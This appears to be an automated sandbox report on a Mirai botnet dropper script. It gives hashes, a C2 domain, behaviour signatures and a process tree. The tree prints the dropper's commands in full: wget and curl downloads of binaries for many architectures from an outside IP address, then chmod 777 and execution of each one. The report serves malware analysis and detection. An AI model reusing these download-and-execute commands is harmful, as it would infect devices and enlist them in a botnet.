
Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20240418-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    11/03/2025, 14:02

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    d2fc82c2b868db8956bd1a152673f5a7

  • SHA1

    01899c680da79b2e7302f5898e150254bd7ef207

  • SHA256

    29eae7a3fc0f8f73775f7202b9b7972c62a40320b7331588db4e8cf560749719

  • SHA512

    5b9cf48ea5473fab850d23cf04d1d56ebcf7046c6cdfa72524d4c9af7f40721a059e622082250df23c2f6d1766bfce740b906d477fc28f2594e13d1879e121d2

Malware Config

Extracted

Family

mirai

C2

huyhoangluvnhi.duckdns.org

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • File and Directory Permissions Modification (1 TTPs, 15 IoCs)

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE (15 IoCs)
  • Enumerates active TCP sockets (1 TTPs, 13 IoCs)

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Changes its process name (14 IoCs)
  • Reads system network configuration (1 TTPs, 13 IoCs)

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information (64 IoCs)

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery (1 TTPs, 3 IoCs)

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory (28 IoCs)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.x86
      2⤵
      • Writes file to tmp directory
      PID:740
    • /bin/cat
      cat blah.x86
      2⤵
      PID:741
    • /bin/chmod
      chmod 777 blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
      2⤵
      • File and Directory Permissions Modification
      PID:742
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      PID:743
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:745
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:746
    • /bin/cat
      cat blah.mips
      2⤵
      • System Network Configuration Discovery
      PID:772
    • /bin/chmod
      chmod 777 blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
      2⤵
      • File and Directory Permissions Modification
      PID:774
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Changes its process name
      • Reads runtime system information
      PID:775
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.arc
      2⤵
      PID:777
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.arc
      2⤵
      • Writes file to tmp directory
      PID:794
    • /bin/chmod
      chmod 777 blah.arc blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
      2⤵
      • File and Directory Permissions Modification
      PID:800
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:801
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.i468
      2⤵
      PID:834
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.i468
      2⤵
      • Writes file to tmp directory
      PID:835
    • /bin/chmod
      chmod 777 blah.arc blah.i468 blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
      2⤵
      • File and Directory Permissions Modification
      PID:837
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:838
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.i686
      2⤵
      PID:840
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.i686
      2⤵
      • Writes file to tmp directory
      PID:842
    • /bin/chmod
      chmod 777 blah.arc blah.i468 blah.i686 blah.mips blah.x86 HOLYLOVE ohshit.sh systemd-private-be51b2dccf49463fbb11c0f57fafad67-systemd-timedated.service-NcUGxx
      2⤵
      • File and Directory Permissions Modification
      PID:844
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:845
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.x86_64
      2⤵
      • Writes file to tmp directory
      PID:850
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.x86_64
      2⤵
      • Writes file to tmp directory
      PID:852
    • /bin/chmod
      chmod 777 blah.arc blah.i468 blah.i686 blah.mips blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:854
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:855
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.mpsl
      2⤵
      • Writes file to tmp directory
      PID:857
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.mpsl
      2⤵
      • Writes file to tmp directory
      PID:859
    • /bin/chmod
      chmod 777 blah.arc blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:861
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:862
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.arm
      2⤵
      • Writes file to tmp directory
      PID:864
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.arm
      2⤵
      • Writes file to tmp directory
      PID:866
    • /bin/chmod
      chmod 777 blah.arc blah.arm blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:868
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:869
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.arm5
      2⤵
      • Writes file to tmp directory
      PID:871
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.arm5
      2⤵
      • Writes file to tmp directory
      PID:873
    • /bin/chmod
      chmod 777 blah.arc blah.arm blah.arm5 blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:875
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:876
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.arm6
      2⤵
      • Writes file to tmp directory
      PID:878
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.arm6
      2⤵
      • Writes file to tmp directory
      PID:880
    • /bin/chmod
      chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:882
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:883
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.arm7
      2⤵
      • Writes file to tmp directory
      PID:885
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.arm7
      2⤵
      • Writes file to tmp directory
      PID:887
    • /bin/chmod
      chmod 777 HOLYLOVE blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.mips blah.mpsl blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:889
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:890
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.ppc
      2⤵
      • Writes file to tmp directory
      PID:892
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.ppc
      2⤵
      • Writes file to tmp directory
      PID:894
    • /bin/chmod
      chmod 777 HOLYLOVE blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.mips blah.mpsl blah.ppc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh
      2⤵
      • File and Directory Permissions Modification
      PID:896
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:897
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.spc
      2⤵
      • Writes file to tmp directory
      PID:899
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.spc
      2⤵
      • Writes file to tmp directory
      PID:901
    • /bin/chmod
      chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.mips blah.mpsl blah.ppc blah.spc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh HOLYLOVE
      2⤵
      • File and Directory Permissions Modification
      PID:903
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:904
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.m68k
      2⤵
      • Writes file to tmp directory
      PID:906
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.m68k
      2⤵
      • Writes file to tmp directory
      PID:908
    • /bin/chmod
      chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.m68k blah.mips blah.mpsl blah.ppc blah.spc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh HOLYLOVE
      2⤵
      • File and Directory Permissions Modification
      PID:910
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:911
    • /usr/bin/wget
      wget http://160.191.245.152/dlr/blah.sh4
      2⤵
      • Writes file to tmp directory
      PID:913
    • /usr/bin/curl
      curl -O http://160.191.245.152/dlr/blah.sh4
      2⤵
      • Writes file to tmp directory
      PID:915
    • /bin/chmod
      chmod 777 blah.arc blah.arm blah.arm5 blah.arm6 blah.arm7 blah.i468 blah.i686 blah.m68k blah.mips blah.mpsl blah.ppc blah.sh4 blah.spc blah.x86 blah.x86_64 HOLYLOVE ohshit.sh HOLYLOVE
      2⤵
      • File and Directory Permissions Modification
      PID:917
    • /tmp/HOLYLOVE
      ./HOLYLOVE
      2⤵
      • Enumerates active TCP sockets
      • Changes its process name
      • Reads system network configuration
      • Reads runtime system information
      PID:918

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/HOLYLOVE

    Filesize

    58KB

    MD5

    1c8b6437a383e5816d7444525fc1508b

    SHA1

    4eefd8b14e3f7ac66a30f73b495b40839e5f6bb4

    SHA256

    1e74b70fafd03b372bd8f0b932ae682ab2ea7b73f69744dfc26e24385f23f569

    SHA512

    4acca052eece00944ceb143a6c898b4ce03061d4ad36598347128388ad5399431c0e989a2c7a6f2c1689e65ed34c25390d197492b6169ed1942cd928d331857c

  • /tmp/blah.x86

    Filesize

    40KB

    MD5

    2e689db77eaea41c04a31165f6ee7184

    SHA1

    170440f67d1eba5b252aa5bc6e2f0a026b6c8cef

    SHA256

    2ce9fb3fae4dd2c0540e15c416d79a33933b714551d6016b28ddaa0f52a06913

    SHA512

    5bc67648bb6650b1c6b4e1a9ca39cfb9dc719b7d670f83647445411df348e05ad1a06b0ae85e91625ec38bc18b4e5b75ba40f06c8652c025c7abfaa8513c00b4